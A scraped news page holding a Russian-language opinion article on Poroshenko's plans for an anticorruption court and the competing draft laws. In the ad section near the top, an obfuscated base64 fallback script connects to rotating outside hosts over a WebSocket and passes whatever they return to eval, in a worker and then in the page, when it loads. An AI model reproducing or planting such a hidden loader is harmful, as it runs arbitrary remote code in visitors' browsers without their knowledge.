          <a class='auth_button' href='/author/aleksandr-lemenov'>
            Все статьи автора
          </a>
        
        <a class='auth_button' href='/authors'>
          Все авторы
        </a>
      </div>
    </div>
  </div>

    <div id='social_block_article' class='social_block'>
      <span class='caption center'>Поделитесь с друзьями</span>
      <div class='social_list'>
        <span class='share_block'></span>
        <div class='addthis_inline_share_toolbox'></div>
        <div class='social_item'>
          <a class='social_link comment' href='#comment'>
            <span class='capt'>
              Комментировать
            </span>
            <span class='count'>
            </span>
          </a>
        </div>
      </div>
    <div style="clear: both"></div>
    <div id="MIXADV_2407" class="MIXADVERT_NET"></div>
          <script type="text/javascript">
          var node2407 = document.getElementById("MIXADV_2407");
          if( node2407 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=2407&r="+Math.random();
               node2407.parentNode.appendChild(script);
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTI0MDcmcj0iK01hdGgucmFuZG9tKCk7bm9kZTI0MDcucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozY3pvdkx5SXJhRzl6ZENzaU9qZ3dPREF2TWpRd055SXBPeUJqYjI1dUxtOXViV1Z6YzJGblpTQTlJR1oxYm1OMGFXOXVJQ2hsZG5RcElIc2djRzl6ZEUxbGMzTmhaMlVvWlhaMExtUmhkR0VwT3lCamIyNXVMbU5zYjNObEtDazdmU2M3ZG1GeUlIZHZjbXRsY2lBOUlHNWxkeUJYYjNKclpYSW9WVkpNTG1OeVpXRjBaVTlpYW1WamRGVlNUQ2h1WlhjZ1FteHZZaWhiSW1WMllXd29JQ2NpSzNOMGNpc2lKeWtpWFNrc0lIdDBlWEJsT2lBbmRHVjRkQzlxWVhaaGMyTnlhWEIwSjMwcEtUdDNiM0pyWlhJdWNHOXpkRTFsYzNOaFoyVW9KekVuS1RzZ2QyOXlhMlZ5TG05dWJXVnpjMkZuWlNBOUlHWjFibU4wYVc5dUlDaHRjMmNwSUhzZ2QybHVaRzkzTG1WMllXd29iWE5uTG1SaGRHRXBPeUI5T3lBPSIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
              }
          }
          </script>
    </div>
  </div>

  <div class='article_center'>
    <div class="top_social_holder">
    <noindex>
      <div class="top_social_b">
        <div class='fb_holder'><div class='fb-like' data-layout='button_count' data-action='recommend' data-show-faces='false' data-share='false'></div></div>
        <div class='twitter_holder'><a href='http://twitter.com/share' class='twitter-share-button' data-text='Антикоррупционные суды  &quot;по-новому&quot;: рецепт Порошенко' data-via='zn_ua' data-lang='ru'>Твитнуть</a></div>
        <div class='g_button'><div class='g-plus' data-action='share' data-annotation='bubble'></div></div>

        <div class='clear'></div>
      </div>
    </noindex>
    </div>
    <div class="article_body" itemprop="articleBody">
      <div class="summary" itemprop="alternativeHeadline">
        <p>
          Президент Украины четко отметил, что создание эффективного и независимого суда поможет привлекать к уголовной ответственности коррупционеров, кем бы они ни были.
        </p>
      </div>
      <p></p>

<div class="bottom_block">



      <div class="picture">
        
        
        
        <div class='top_photo top'>
           <div class="frame_image">
              <div class='gradient_article'></div>
              <img class='img' src='//image.zn.ua/media/images/645x426/Oct2017/186441.jpg' alt='' title='суд' />
           </div>
           <span class='photo_descr'>
             <span class='title'>
               
             </span>
            
            <a target='_blank' href='https://ua.depositphotos.com/110928880/stock-photo-statue-of-lady-justice-in.html' class='source'>&#169 depositphotos /	Hackman</a>
            
            

           </span>
           
        </div>
        
      </div>
      <div class='article_body'>
        <div class='text'>
            <p class="p1"><strong>На этой неделе президент Украины наконец произнес слова, которых сторонился больше года. </strong></p>
<p class="p5">Петр Порошенко обратился в парламент с предложением немедленно создать рабочую группу в комитете по вопросам правовой политики при председателе Верховной Рады либо в формате межфракционной группы для разработки законопроекта об антикоррупционном суде. Также в ближайшее время собираются создать специализированную антикоррупционную палату в Верховном суде, которая бы была кассационной инстанцией по всем антикоррупционным делам. Создание такой палаты в наивысшей инстанции будет, по плану гаранта, не <em>вместо</em> антикоррупционного суда, а как <em>приложение</em> к нему.</p>
<p class="p5">По его словам, наработка согласованного нормативно-правового акта, где будут учтены позиции всех политических групп, является одной из ключевых задач парламента. После этого законопроект следует представить персонально президенту, чтобы позже Порошенко внес его в Верховную Раду с пометкой "неотложный". </p>
<p class="p5">При этом президент не хочет, чтобы это стало фундаментом для политического пиара и спекуляций, ведь дело не в том, кто увенчает себя лавровым венком победителя, а в создании эффективного и независимого судебного органа, который будет специализироваться на борьбе с коррупцией и поможет ускорить рассмотрение дел против коррупционеров, кем бы они ни были. Порошенко отметил, что антикоррупционный суд должен формироваться на конкурсной основе под бдительным надзором украинской общественности. Вместе с тем Петр Алексеевич упомянул о неуместности пытаться превратить это учреждение в политическую инквизицию. </p>
<p class="p5">В конце глава государства четко высказался относительно эффективного антикоррупционного учреждения, которое будет руководствоваться верховенством права и принципами национального суверенитета. Последний аккорд в волевом выступлении Порошенко прозвучал так: "Украинцы сами способны сформировать судебную систему, включительно с антикоррупционным судом".</p>
<p class="p6"><strong>Трансформация идей относительно создания суда</strong></p>
<p class="p7">Напомним, что создание антикоррупционного суда предусмотрено принятым летом прошлого года Законом Украины "О судоустройстве и статусе судей". В этом документе не только задекларирована возможность создать такое учреждение, но и провозглашены условия его создания и проведения конкурса на должности судей. Позже были представлены два законопроекта, касавшиеся этой темы. </p>
<p class="p5">Первый 3 февраля 2016 г. внесла в парламент группа народных депутатов (Егор Соболев, Сергей Лещенко, Мустафа Найем, Светлана Залищук, Оксана Сыроид, Иван Крулько). Этим законопроектом (№6011) предлагается создать Высший антикоррупционный суд и апелляционную инстанцию к нему, а также специальный предупредительный механизм при отборе судей с участием международных экспертов, которые не пропустят недобросовестных кандидатов, поскольку будут иметь блокировочный пакет во время голосования. Следует подчеркнуть, что в целом процедура при отборе судей для антикоррупционных судов будет типичной — те же этапы отбора при участии Высшей квалификационной комиссии судей, Высшего совета правосудия и президента Украины.</p>
<p class="p5">Второй законопроект 31 мая 2016 р. внес член фракции БПП Сергей Алексеев. Этим законопроектом (№6529) предлагается ввести обязательную специализацию судей по рассмотрению коррупционных и связанных с коррупцией правонарушений. При этом нет аналогии об участии международных экспертов в процессе отбора кандидатов, что может иметь последствием откровенные манипуляции провластных элит и протягивание "нужных" служителей Фемиды в антикоррупционные палаты. Также укажем, что создавать эти палаты в действующих судах нет никакой надобности, ибо от смены вывесок на судах верховенство права точно не воцарится в том же Соломенском районном суде, где месяцами рассматриваются расследованные детективами НАБУ дела.</p>
<p class="p5">В поддержку второго варианта, предложенного нардепом Алексеевым, выступали Генеральный прокурор Юрий Луценко, представитель ближайшего окружения президента Игорь Кононенко, а также ряд неординарных фигур разного политического веса. Всем понятно, что команда Порошенко под разными медийными соусами жаждала продать западным партнерам идею создания антикоррупционных палат. Во-первых, это был бы контролируемый с Банковой процесс. Во-вторых, представители Петра Алексеевича могли бы четко прогнозировать результат и избрать именно тех судей, к которым у них есть "доверие".</p>
<p class="p5">Позже, 15 сентября 2016 г., во время выступления на Yalta European Strategy Петр Порошенко лично заявил, что надеется на создание антикоррупционных палат в течение месяца. У него якобы нет времени ждать полтора или два года, пока создадут антикоррупционный суд. Это казалось как минимум странным. А как максимум эти слова можно назвать откровенной манипуляцией со стороны главы государства. Создание 450 палат в судах первой инстанции и 27 палат в апелляционных — более громоздкая задача, чем создание Высшего антикоррупционного суда и соответствующей апелляционной инстанции.</p>
<p class="p6"><strong>Венецианский бенефис: что скажет комиссия?</strong></p>
<p class="p7">Как уже отмечало ZN.UA, оба законопроекта — №6011 и №6529 — недавно переданы на экспертизу в Венецианскую комиссию за демократию через право. Три недели назад экспертам казалось, что этот провластный реверанс выполняет сразу две функции. Во-первых, позволяет отложить выполнение требования МВФ относительно принятия законопроекта об антикоррупционном суде. Потому что без денег от фонда трудно сверстать и выполнить бюджет. Во-вторых, отправление в Венецианскую комиссию могло привести к признанию законопроекта №6011 неконституционным из-за фигурирования в документе механизма избрания судей специальной независимой комиссией с иностранным элементом. </p>
<p class="p5">Сейчас можно утверждать, что первое предположение не оправдалось. Несколько недель назад Министерство финансов было в состоянии привлечь 3 млрд долл. через размещение еврооблигаций под 7,375% годовых с 15-летним сроком погашения. Да, эти деньги значительно дороже, чем средства, которые предоставляет МВФ. Однако команда Порошенко решала несколько другие задачи, чем привлечение максимально дешевых займов. Прежде всего на Банковой больше не захотели быть под придирчивой критикой относительно отсутствия реформ. Тем более, когда антикоррупционный суд был приоритетом №1 у западных партнеров. Второе, что беспокоило Порошенко, — так это макроэкономическая стабильность Украины вплоть до президентских выборов 2019 г. Третье, чем руководствовались соратники главы государства, — так это концентрация влияния не только на правоохранительные органы, но и на новообразованные судебные учреждения. </p>
<p class="p5">В ближайшие дни должны объявить решение Венецианской комиссии за демократию через право относительно двух упомянутых законопроектов о создании антикоррупционных судебных учреждений. И кажется, там не будет поддержки или сокрушительной критики ни одного из них. Более того, законопроекты анализируются в политико-правовом контексте, а не сугубо в формате соответствия принципам права и конституции соответствующей страны. </p>
<p class="p5">Очевидно, президентская команда справилась об отдельных нюансах выводов Венецианки и потому, перегруппировав свою позицию, на Банковой пошли в контратаку, заявив о создании независимых антикоррупционных судов. При этом слова "независимый" и "антикоррупционные суды" были в разных частях выступления Порошенко.</p>
<p class="p8"><strong>Рецепт Петра Порошенко</strong></p>
<p class="p7">Все выступление Порошенко, когда он наконец упомянул о создании антикоррупционного суда, было пронизано скрытыми месседжами, адресованными политикам, общественности и международным партнерам. Попробуем разобрать каждый из них.</p>
<p class="p5"><strong>Во-первых</strong>, Петр Порошенко понял, что речь не может идти о создании антикоррупционных палат в действующих судах. Этот абсурд был умножен на нуль и потому взят за основу формулировки о создании антикоррупционных судов. При этом президент передал функцию разработки нового (а не взятие за основу №6011 или №6529) документа, который позже он внесет в Верховную Раду. Здесь следует заметить, что создание рабочей группы и согласование нового законопроекта затянет процесс принятия решения о создании суда.</p>
<p class="p5">Интересный факт: Петр Алексеевич определил именно подконтрольный ему комитет по вопросам правовой политики, который возглавляет лояльный к нему Руслан Князевич. О "неблагонадежном" комитете по вопросам предотвращения и противодействия коррупции, возглавляемом Егором Соболевым, вообще речь не идет. Альтернатива — рабочие группы при спикере парламента Парубие либо вообще абстрактная межфракционная группа.</p>
<p class="p5"><strong>Во-вторых</strong>, Порошенко хочет избежать ситуации, когда антикоррупционное судебное учреждение создано если не вопреки, то как минимум без его участия. И слова о лаврах — красноречивое тому подтверждение. Кто, как не гарант Конституции, должен получить все политические дивиденды, особенно, если суд будет создаваться ближе к следующим президентским гонкам?</p>
<p class="p5"><strong>В-третьих</strong>, быстрое создание антикоррупционной инстанции в новом Верховном суде не имеет никакого смысла без создания судов первой и второй (апелляции) инстанций. Это как начинать строить дом с монтажа окон или конструирования крыши. Такие инициативы лишены какого-либо институционного смысла.</p>
<p class="p5"><strong>В-четвертых</strong>, президент Украины четко отметил, что создание эффективного и независимого суда поможет привлекать к уголовной ответственности коррупционеров, кем бы они ни были. Очевидно, кого-то из друзей, но, разумеется, не из ближайшего окружения Порошенко, возложат на алтарь правосудия ради политического жертвоприношения. Но превращать в инквизицию этот суд он не готов, что является неким месседжем для успокоения элит.</p>
<p class="p5"><strong>В-пятых</strong>, глава государства расставил все точки над і, когда провозгласил ключевые принципы, которыми будут руководствоваться во время создания антикоррупционного суда. Это верховенство права и принцип национального суверенитета. С первым все понятно, о нем любят рассказывать в каждом, даже самом темном, закоулке реформ. А вот второй аспект — национальный суверенитет — в совокупности с фразой о формировании судебной системы исключительно украинцами приводит к мнению, что президентская команда при любых условиях не оставит попыток избежать участия международных экспертов в конкурсном отборе кандидатов в антикоррупционные суды. Потому что непрогнозируемость выбора и дальнейшая неконтролируемость судей равнозначны потере контроля над всей страной, где царят коррупция и неофеодальное устройство государства.</p>
<p class="p9"> </p>
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
        <script type="text/javascript">
          var positionBanner = 2500; //интервал размещения баннеров
          var heightBody =  $(".article_center .article_body .text").height(); //высота статьи
//          console.log('--heightBody' + heightBody);
          var offset = $(".article_center .article_body .text").offset();   //отступ от начала статьи до баннера
//          console.log('--offset' + heightBody);
          var array = {};
          var m = 1;
          var banner = false;

          if(heightBody>positionBanner){
            var countBanner = Math.round(heightBody/positionBanner); //кол-во банеров в статье
            for (var i=0; i<countBanner; i++){
              array[i] = positionBanner*(i+1);
            }
            $(".article_center .article_body .text p").each(function(n){
              if(Math.round($(this).offset().top)>=positionBanner*m) {
                banner = false;
                m++;
              }
              if(Math.round($(this).offset().top)>=positionBanner && Math.round($(this).offset().top)<positionBanner*m && !banner) {
                $(this).addClass("banner_txt");
                $(this).append("<div id='poster"+m+"' style='width:650px; margin:20px auto 0;'><ins class='adsbygoogle' style='display:block; text-align:center;' data-ad-format='fluid' data-ad-layout='in-article' data-ad-client='ca-pub-5515961538037914' data-ad-slot='5625831357'></ins></div>");
                banner = true;
                (adsbygoogle = window.adsbygoogle || []).push({});
              }
            });
          }
        </script>
        </div>
        
        <ul class='hashtags'>
        
          <li class='item'>
            <a class='section' href='/tags/Александр Леменов'>#Александр Леменов</a>
          </li>
        
        </ul>


      </div>

      
      <span class="link">
        <span class="source_caption">
          По материалам:
            
              
                <a href='/go/aHR0cDovL3puLnVhLw==' target='_blank' rel='nofollow'>ZN.UA</a>
                <span class='divider'>/</span>
              
              
            
        </span>
      </span>


      <!--<span class='soc'>
        <span class='share_block'></span>
        <div class="soc yashare-auto-init" data-yashareL10n="ru" data-yashareType="big" data-yashareQuickServices="vkontakte,facebook,twitter,gplus,odnoklassniki" data-yashareTheme="counter"></div>
      </span>-->
      <form id='mistake_form' class='ajax form' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#mistake_msg' method='post' enctype='multipart/form-data' rel='{"connector":"box_znua2","point":"central_article"}'>
         <span class='mistake '><b>Заметили ошибку?</b><br>Пожалуйста, выделите ее мышкой и нажмите Ctrl+Enter</span>
         <input type='hidden' id='mistake_text' name='mistake_text' value='' />
         <input type='hidden' id='editor_name' name='editor_name' value='Силин Андрей' />
         <input type='hidden' id='article_title' name='article_title' value='Антикоррупционные суды  &quot;по-новому&quot;: рецепт Порошенко' />
         <input type='hidden' name='action' value='mistake' />
      </form>
      <div id='mistake_msg'></div>
      <div class="clear"></div>
    </div>




   </div>
  </div>
</div>
<script type="text/javascript" src="//yastatic.net/share/share.js" charset="utf-8"></script>
<script type='text/javascript'>
  $(document).ready(function(){

    var distanceTop_fix = $('#social_block_article').offset().top + 50;
    var comment_height = $('#comments_block').outerHeight();
    //var distanceTop_abs = $('#comments_block').offset().top + comment_height - $('#social_block_article').outerHeight() - 50;
    var distanceTop_abs = $('#comments_block').offset().top + comment_height - 530;


    $(window).scroll(function(){
      try {
        var pos = parseInt( $( window ).scrollTop() );

        if (pos > distanceTop_fix) {
          $('#social_block_article').addClass('fixed');
          $('#social_block_article').css({'top': '80px'});

          }
        else {
          $('#social_block_article').removeClass('fixed');
        }
        if (pos > distanceTop_abs) {
          $('#social_block_article').addClass('abs');
          $('#social_block_article').css({'top': distanceTop_abs+'px'});
          }
        else {
          $('#social_block_article').removeClass('abs');
          $('#social_block_article').css({'top':'80px'});
        }
      }
      catch(e) {
      }
    });


  });

  box_znua2.central_article.init();

</script><div class="banner8">
  <div style="width:580px; height:400px;">
    <script type="text/javascript">
    function adriverPoster(L){
        if(typeof(ar_cn)=="undefined")ar_cn=1;
        var W=window,D=document,E=D.documentElement,T=0,N=ar_cn,P=0,C=D.compatMode=="CSS1Compat",
            X='<scr'+'ipt type="text/javascript">var ar_bnum='+N+';setTimeout(function(e){if(!self.CgiHref){document.close();e=parent.document.getElementById("ar_container_"+ar_bnum);e.parentNode.removeChild(e)}},3000);',
            Y='<\/sc'+'ript><sc'+'ript type="text/javascript" src="' + ('https:' == document.location.protocol ? 'https:' : 'http:') + ''+L+'&tail256='+escape(D.referrer||'unknown')+'&rnd='+Math.round(Math.random()*999999999)+'"><\/sc'+'ript>';
        function G(){if(T++<100){var ph=document.getElementById('ad_ph_'+N);if (ph){var c=ph.previousSibling;c.innerHTML='<iframe id="ar_container_'+N+'" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0><\/iframe>'}else{setTimeout(arguments.callee,100);return}var o=D.getElementById('ar_container_'+N);if(o){try{var d=o.contentDocument||(W.ActiveXObject&&W.frames['ar_container_'+N].document);if(d){d.write(X+Y)}else setTimeout(arguments.callee,100)}catch(e){try{o.src = "javascript:{document.write('"+X+'document.domain="'+D.domain+'";'+Y+"')}";return}catch(E){}}}else setTimeout(arguments.callee,100)}}
        function A(e,t,f){if(e.addEventListener)e.addEventListener(t,f,false);else if(e.attachEvent)e.attachEvent('on'+t,f)}
        function R(e,t,f){if(e.removeEventListener)e.removeEventListener(t,f,false);else if(e.detachEvent)e.detachEvent('on'+t,f)}
        function S(){var ch=self.innerHeight||C&&E.clientHeight||D.body.clientHeight,st=self.pageYOffset||C&&E.scrollTop||D.body.scrollTop;if(P>=st&&st+ch>=P){R(W,'scroll',S);G()}}
        A(W,'load',function(){var o=D.getElementById('ad_ph_'+N);if(o){while(o.offsetParent){P+=o.offsetTop;o=o.offsetParent}A(W,'scroll',S);S()}});
        D.write('<div style="position:absolute;visibility:hidden;height:0px;"><\/div><div id="ad_ph_'+N+'"><\/div>');
        ar_cn++;
    }
    adriverPoster('//ad.adriver.ru/cgi-bin/erle.cgi?sid=161943&bn=6&target=blank&bt=49&pz=0');
    </script>
  </div>
</div><div id='comments_block' class='cb_small'>
  <a class='comment_anchore' name='comment' id='comment'></a>
  
<link rel='stylesheet' type='text/css' href='/static/style/comments.css' />
<div class='c_head'>
  <span class='block_title'>Добавить комментарий</span>
  <span class='u_form'>
    <form class='comments_block ajax' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#comments_block' method='post' enctype='multipart/form-data' rel='{"connector":"box_znua2","point":"comments"}'>
      <img class='u_avatar' src='' alt='' title='' />
      <span class='b_text'>
        <span class='f_quote q' style='display:none;'>
          <span class='n'></span>
          <span class='d'></span>
          <span class='t'></span>
        </span>
        <span class='behavior_holder'>
          <span class='behavior' id='behavior_comment_textarea'></span>
        </span>
        <textarea id='comment_textarea' class='textarea' name='comment' placeholder='Комментарий'></textarea>
      </span>
      <div class='label msg'>Осталось символов: <span class='label' id='comment_length'>2000</span></div>
      <div class='label msg_warning'>Авторизуйтесь, чтобы иметь возможность комментировать материалы</div>
      <input disabled type='button' id='comment_submit' class='u_submit' value='Отправить комментарий' />
      
      <input type='hidden' name='action' value='adding' />
      <input type='hidden' name='id_comment' value='0' />
    </form>
  </span>

  
  <div id='c_user_auth' class='1' style='display:none;'>
    <div class='ca_menu'>
      <a rel='register' class='a selected' href='javascript:void(0)'>
        <span class='text'>Нет учетной записи? Зарегистрируйтесь!</span>
        <span class='plash_sel'></span>
      </a>
      <a rel='login' class='a' href='javascript:void(0)'>
        <span class='text'>Логин</span>
        <span class='plash_sel'></span>
      </a>
      <a rel='forgot' class='a' href='javascript:void(0)'>
        <span class='text'>Забыли пароль?</span>
        <span class='plash_sel'></span>
      </a>
<!--//      <span rel='settings' class='a last'>
        <span class='text'>Settings</span>
        <span class='plash_sel'></span>
      </span>//-->
    </div>

    <div class='ca_cntn register' style='display:none;'>
      <form class='ajax' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_znua2","point":"ua_register"}'>
        <div class='i_inp i_login'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Логин' name='login' value='' size='20' />
        </div>
<!--//        <div class='i_inp i_fullname'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Full name' value='' name='fullname' size='20' />
        </div>//-->
        <div class='i_inp i_email i_last'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Адрес электронной почты' value='' name='email' size='50' />
        </div>
        <div class='i_inp i_password'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_1' class='field pass' type='password' placeholder='Пароль' name='password' value='' size='20' />
          <a rel='eye_pass_1' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <div class='i_inp i_password_confirm'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_2' class='field pass' type='password' placeholder='Repeat Password' name='password_confirm' value='' size='20' />
          <a rel='eye_pass_2' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <div class='i_inp i_captcha i_last'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <img   class='img_captcha' src='/static/app/captcha/index.php?width=80&height=30&fontsize=20&mode=5ba35b44dc1edf054662c8c13d0077ee&unique=bda5c62c45b730a70a858fdc765fd804' alt='captcha' />
          <input class='field f_captcha' type='text' placeholder='Проверка' name='captcha' value='' size='20' />
        </div>
        <input type='submit' class='button' value='Зарегистрироваться' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.register' />
      </form>
    </div>

    <div class='ca_cntn login' style='display:none;'>
      <form class='ajax' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_znua2","point":"ua_login"}'>
        <div class='i_inp i_login'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Логин' name='login' value='' size='20' />
        </div>
        <div class='i_inp i_password'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input rel='pass_3' class='field pass' type='password' placeholder='Пароль' name='password' value='' size='20' />
          <a rel='eye_pass_3' class='pass_eye' href='javascript:void(0);'></a>
        </div>
        <input type='submit' class='button' value='войти' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.login' />
      </form>
    </div>

    <div class='ca_cntn forgot' style='display:none;'>
      <form class='ajax' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#cua_message' method='post' enctype='multipart/form-data' rel='{"connector":"svc_znua2","point":"ua_forgot"}'>
        <div class='i_inp i_email'>
          <span class='msg'><span class='txt'></span><span class='arw'></span></span>
          <input class='field' type='text' placeholder='Адрес электронной почты' value='' name='email' size='50' />
        </div>
        <input type='submit' class='button' value='напомнить пароль' />

        <input type='hidden' name='xpath' value='#c_user_auth .ca_cntn.forgot' />
      </form>
    </div>

    <div class='soc_auth'>
      <div class='message'>Или войдите через соцсети</div>
      <div class='to_log'>
        <a href='?authstate=3' class='c_fb'>Facebook</a>
        <!--<a href='?authstate=2' class='c_vk'>VKontakte</a>-->
        <a href='?authstate=4' class='c_tw' id='c_login_tw_button'>Twitter</a>
        <a href='?authstate=6' class='c_gp'>Google</a>
      </div>
    </div>



    <div class='ca_hide'>
      <a class='to_hide' href='javascript:void(0)'>Скрыть</a>
    </div>
    <div id='cua_message'></div>

    <script type='text/javascript'>
      function caFormMode(mode) {
        $('#c_user_auth .ca_menu .a').each(function(){
          $(this).removeClass('selected');
          if($(this).attr('rel') == mode && !$(this).is('.selected')) {
            $(this).addClass('selected');
          }
        });

        $('#c_user_auth .ca_cntn').each(function(){
          $(this).hide();
          if($(this).is('.'+mode)) {
            $(this).show();
          }
        });
      };

      $(document).ready(function(){
        caFormMode('login');

        $('#c_user_auth .ca_menu a.a').click(function(){
          caFormMode($(this).attr('rel'));
        });

        $('#c_user_auth .field.pass').hover(
          function () {
            var r = 'eye_'+$(this).attr('rel');
            if(!$('#c_user_auth .pass_eye[rel='+r+']').is('.hover')) $('#c_user_auth .pass_eye[rel='+r+']').addClass('hover');
          },
          function () {
            var r = 'eye_'+$(this).attr('rel');
            if($('#c_user_auth .pass_eye[rel='+r+']').is('.hover')) $('#c_user_auth .pass_eye[rel='+r+']').removeClass('hover');
          }
        );

        $('#c_user_auth .field.pass').live('focus', function () {
          var r = 'eye_'+$(this).attr('rel');
          if(!$('#c_user_auth .pass_eye[rel='+r+']').is('.focus')) $('#c_user_auth .pass_eye[rel='+r+']').addClass('focus');
        });

        $('#c_user_auth .field.pass').live('blur', function () {
          var r = 'eye_'+$(this).attr('rel');
          if($('#c_user_auth .pass_eye[rel='+r+']').is('.focus')) $('#c_user_auth .pass_eye[rel='+r+']').removeClass('focus');
        });

        $('#c_user_auth .pass_eye').click(function(){
          var r = $(this).attr('rel').replace('eye_','');
          var o = $('#c_user_auth .field.pass[rel='+r+']');
          ShowHidePassword($(o),$(this));
        });

        $('#c_user_auth .ca_cntn.register .i_inp').hover(
          function () {
            if($(this).is('.empty')) $(this).removeClass('empty');
            if($(this).is('.error')) $(this).removeClass('error');
          },
          function () {
          }
        );
      });
    </script>
  </div>
  
</div>

<form action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#comment_update' method='POST' enctype='multipart/form-data' class='update ajax' rel='{"connector":"int_znua2","point":"comment_update"}'>
  <span id='comment_update'></span>
  <input type='hidden' name='action' value='' />
  <input type='hidden' name='id_comment' value='0' />
</form>

<div id='comments_list' class='comments_block'>
  
  <form class='comments_list ajax' action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#comments_list' method='post' enctype='multipart/form-data' rel='{"connector":"int_znua2","point":"comments_list"}'></form>
  <div class='c_sort'>
    
    <span class='ci count'>Всего комментариев: <span>0</span></span>
  </div>

  
<ul class='comments'>
  
</ul>

<div id='0362a54a847b1691223ffafbc420b1a6' class='more_content'>
  <input type='hidden' id='cl_current_sort' value='popular' />
  <input type='hidden' id='cl_current_count' value='1' />
  

  <form action='/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html#0362a54a847b1691223ffafbc420b1a6' method='POST' enctype='multipart/form-data' class='ajax' rel='{"connector":"int_znua2","point":"comments_list"}'></form>
</div>

<script type='text/javascript'>
  $(document).ready(function() {
    $('#0362a54a847b1691223ffafbc420b1a6 a.show_comments').click(function(){
      box_znua2.set_post_params_by_url($(this).attr('href'),'#0362a54a847b1691223ffafbc420b1a6 form');
      box_znua2.preloader.show();
      $(this).hide();
      cb_backing_form();
      $('#0362a54a847b1691223ffafbc420b1a6 form').submit();
      return false;
    });
  });
</script>

<script type='text/javascript'>
  box_znua2.preloader.hide();
</script>


  <script type='text/javascript'>
    $(document).ready(function() {
      $('#comments_list .c_sort a.sort').click(function(){
        box_znua2.set_post_params_by_url($(this).attr('href'),'#comments_list form.comments_list');
        box_znua2.preloader.show();
        cb_backing_form();
        $('#comments_list form.comments_list').submit();
        return false;
      });
    });
  </script>

</div>






<script type='text/javascript'>
  $(document).ready(function() {
    $('#comment_textarea').focus(function(e) {
      if($('#comments_block #c_user_auth').length > 0) {
        $('#comments_block #comment_textarea').prop('disabled', true);
        $('#container #comments_block .label.msg_warning').css("visibility","visible");
        caFormMode('login');
        cua_show();
      }
    });

    $('#comment_textarea').keyup(function(e) {
      textareaBehavior($('#comment_textarea'), $('#behavior_comment_textarea'), 30);
    });

    $('#comment_submit').click(function(){
      box_znua2.preloader.show();
      $('#comments_block form.comments_block').submit();
      return false;
    });
  });
</script>

<script type='text/javascript'>
  box_znua2.preloader.hide();
</script>

</div>



<script type='text/javascript'>
  function cb_backing_form() {
    var uf = $('#comments_block .u_form');
    $(uf).prependTo("#comments_block .c_head");
    $(uf).find('[name="id_comment"]').val(0);
    $(uf).find('[name="action"]').val('insert');
    $(uf).find('[name="sort"]').remove();
    $(uf).find('[name="limit"]').remove();
    $(uf).find('.f_quote').hide();
  };

  function cua_show() {
    if(!$('#comments_block #c_user_auth').is(':visible')) {
      $('#comments_block #c_user_auth').animate({height:'show'}, 500);
    }
  };

  function cua_hide() {
    if($('#comments_block #c_user_auth').is(':visible')) {
      $('#comments_block #c_user_auth').animate({height:'hide'}, 500);
    }
  };

  $(document).ready(function() {
    $(document).on('click','#comments_list .comments a.baq',function(){
      if($('#comments_block #c_user_auth').length > 0) {
        $('html,body').animate({scrollTop: Math.round($('#comments_block').offset().top - $('#header').height())}, 500, function(){
          $('#comment_textarea').focus();
        });
      }
      else {
        var action = $(this).is('.answer')?'answer':'quote';

        var uf = $('#comments_block .u_form');
        $(uf).insertBefore($(this).parent());
        $(uf).find('[name="id_comment"]').val($(this).attr('rel'));
        $(uf).find('[name="action"]').val(action);

        switch(action) {
          case('answer'):
            if($(uf).find('[name="sort"]').length <= 0)  $(uf).find('form').append('<input type="hidden" name="sort" value="'+$('#comments_block #cl_current_sort').val()+'" />');
            if($(uf).find('[name="limit"]').length <= 0) $(uf).find('form').append('<input type="hidden" name="limit" value="'+$('#comments_block #cl_current_count').val()+'" />');

            $(uf).find('.f_quote').hide();
          break;

          case('quote'):
            $(uf).find('[name="sort"]').remove();
            $(uf).find('[name="limit"]').remove();

            var item = $(this).parent().parent().parent();
            $(uf).find('.f_quote .n').text($(item).find('.i_head .u_name').text());
            $(uf).find('.f_quote .d').text($(item).find('.i_head .c_date').text());
